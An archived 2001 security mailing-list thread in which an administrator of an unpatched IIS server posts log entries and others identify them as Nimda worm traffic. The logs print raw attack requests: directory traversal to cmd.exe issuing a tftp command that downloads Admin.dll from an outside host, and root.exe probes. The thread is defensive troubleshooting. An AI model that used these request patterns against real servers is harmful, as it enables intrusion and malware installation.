Yes, I am 206.98.124.52. The ADMIN.DLL file was deleted and the directories the event view is referencing do not exist on my system. I have followed all instruction for removal from variuos postings from CRIME. No file refernced in posting are on my system. Do any of you know how I might stop this attack? -Mike dldean@private (dldean) wrote: This is 206.98.124.52 receiving get requests for the admin.dll from 206.98.79.246 and directory requests for his machine from 206.252.224.50 & 208.238.181.162 . Doug > -----Original Message----- > From: owner-crime@/var/spool/majordomo/lists/crime > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of Kuo, > Jimmy > Sent: Friday, September 21, 2001 2:06 PM > Cc: crime@private > Subject: RE: [RE: Any leads?] > > > Oh, I didn't notice the followup questions you asked the first time. > > I don't know about the structure of your logs. But are you 206.98.124.52? > > Could someone who reads IIS logs say if this is him sending or receiving > GETs? > > And this is definitely Nimda. I just don't know if you're the > target or the > culprit. If you haven't upgraded, I'm tempting to believe you're infected > and attacking others. The TFTP command shows up only on or after > infection. > And ADMIN.DLL (Nimda is admin spelt backwards) is also something > that shows > up after infection. But then you say you don't have it... > > Jimmy > > > -----Original Message----- > > From: J.Michael Cuciti [SMTP:mcuciti@private] > > Sent: Friday, September 21, 2001 1:44 PM > > To: Kuo Jimmy; Crispin Cowan; Jimmy Sadri > > Cc: crime@private > > Subject: Re: [RE: Any leads?] > > > > All: > > > > I still have a script trying to run, but the location and folder doesn't > > exist. The is what I found in my log file: > > > > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, > > 304, > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll, > > > > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, > > 304, > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll, > > > > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, > > 273, > > 403, 5, GET, /scripts/root.exe, /c+dir, > > > > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, > > 1652, > > 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, > > > > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, > > 243, > > 500, 123, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, > > > > If anybody knows what this is, please 'spain it to me. > > > > I am running IIS 3.0, NT4.0 w/sp3 (haven't ungraded, I > inherited this, not > > my > > fault :-) ) > > > > In the event log I see this same type of message running every few > > minutes. > > The script is supposedly running from > > \winnt\iisadmin\Scripts\..%5c..\admin.dll. This does not exist. > > > > Thanks... > > > > Mike Cuciti > > Network Service and Support MAnager > > Tuality Healthcare > > 681.1749 > > > > > > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote: > > >The Melissa author was caught because he posted the infectious > document > > >from his own AOL account to a news group, rather than releasing it > > >through a hacked account. His guilt was confirmed when the > serial number > > >in the document matched the PC in the dumpster outside his bedroom :-) > > > > No. He used a hacked acct. But we identified the exact time of the use > > of > > the acct (newsgroup posting message ID) and the FBI traced the phone > > records. > > > > And the PC was destroyed and never located. > > > > Where did you get your version of the story? > > > > >But Code Red and its derivatives is not an Office document, and > > >therefore has no serial numbers. That investigators appear to have no > > >leads months after Code Red appeared tells me that it was likely > > >released to the wild from a compromised machine, or perhaps > > >simultaneously released from multiple compromised machines. If the > > >author(s) were good, then those compromised machines were initially > > >attacked from other compromised machines. Likely all of these initial > > >release vector machines have long since been wiped and > re-installed, and > > >the links to the author(s) have been cut. > > > > We have some "first instances" of traffic. I don't know what the FBI's > > doing with the information gathered so far. But I agree that it's > > difficult > > and not likely. > > > > Jimmy >
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:46 PDT